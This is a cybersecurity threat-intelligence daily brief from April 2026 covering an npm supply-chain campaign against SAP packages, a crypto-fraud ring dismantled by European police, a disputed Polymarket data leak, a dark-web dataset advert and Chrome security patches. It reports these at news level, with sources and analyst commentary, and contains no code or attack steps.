ZeroFox Daily Intelligence Brief - April 30, 2026

ZeroFox Daily Intelligence Brief - April 30, 2026

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• Supply Chain Campaign “Mini Shai-Hulud” Compromises SAP npm Packages
• European Police Dismantle Major Crypto Investment Fraud Ring
• Threat Actor Claims Polymarket Data Leak; Platform Calls It Public Scraping

Supply Chain Campaign “Mini Shai-Hulud” Compromises SAP npm Packages

Source: https://thehackernews.com/2026/04/sap-npm-packages-compromised-by-mini.html

What we know: Supply chain attack campaign "Mini Shai-Hulud" is reportedly targeting SAP npm packages with credential-stealing malware. The campaign harvests GitHub tokens and cloud secrets by encrypting stolen data via the AES-256-GCM method.

Context: The malicious SAP packages further self-propagate by injecting malicious GitHub Actions workflows into victim repositories. This is among the first supply chain attacks to target AI coding agent configurations for persistence and propagation.

Analyst note: The attack TTPs are consistent with TeamPCP, the threat actor behind multiple successful supply chain attacks including Shai-Hulud, Trivy, and the recent Bitwarden CLI compromise. Adversaries are likely to follow the same playbook, abusing AI automation to compromise developer ecosystems. The malicious Github workflows are also likely to infect thousands of downstream packages leading to credential theft and lateral movement.

European Police Dismantle Major Crypto Investment Fraud Ring

Source:https://www.europol.europa.eu/media-press/newsroom/news/call-centres-dismantled-and-ten-arrested-in-eur-50-million-online-fraud-case

What we know: Law enforcement authorities have dismantled a 50 million euros crypto investment fraud operation. Ten suspects were arrested and three call centers were seized. Authorities also recovered 891,735 euros in cash and hundreds of digital devices for forensic examination.

Context: The scammers used call centers to deceive individuals into fraudulent cryptocurrency investments. Victims across Europe, Canada, and the UK were lured through fake investment platforms on social media, then manipulated by call center operators posing as brokers. Those who lost money were re-targeted with bogus fund recovery services requiring cryptocurrency deposit.

Analyst note: Threat actors involved in scams like this are likely to decentralize their fraud operations using encrypted messaging and crypto mixing services. They are also likely to migrate to less regulated jurisdictions.

Threat Actor Claims Polymarket Data Leak; Platform Calls It Public Scraping

Source: https://hackread.com/polymarket-rejects-data-breach-hacker-records-stolen/

What we know: Threat actor “Xorcat” claimed to have breached Polymarket, the decentralized prediction market platform, and leaked 300,000 records via API flaws, but the company denied any breach. The company asserted that the incident is a scraping of publicly available blockchain and platform data rather than an actual compromise.

Context: Xorcat claimed to have leaked a 1 GB API dump from Polymarket, on Telegram and dark web forum DarkForums, containing about 10 million records, including user profiles (personal information, wallet addresses), comments, reports, and follower data. The actor also claimed to provide a proof-of-concept exploit kit involving alleged vulnerabilities associated with Polymarket, including an SSRF and an authorization flaw.

Analyst note: Even if this leaked information is publicly accessible, this organized dataset is likely to enable large-scale correlation of user identities with wallet activity, increasing risks of profiling, phishing, and targeted scams.

DEEP AND DARK WEB INTELLIGENCE

PwnForums user unico: Untested threat actor “unico” has advertised a 26 GB dataset containing about 73 million records from multiple crypto, Web3, and AI platforms on dark web forum PwnForums. The data, allegedly sourced from 46 databases, includes user records, email addresses, and admin accounts with password hashes.

VULNERABILITY AND EXPLOIT INTELLIGENCE

Chrome security patches: Chrome 147 was released with 30 security fixes, including four use-after-free vulnerabilities affecting components like Canvas, iOS, Accessibility, and Views. Most patched issues are memory and use-after-free bugs that could enable code execution or data exposure. These flaws are likely to enable attackers to execute arbitrary code on a victim’s system, potentially leading to full device compromise.

Affected products: The affected products are included in this advisory.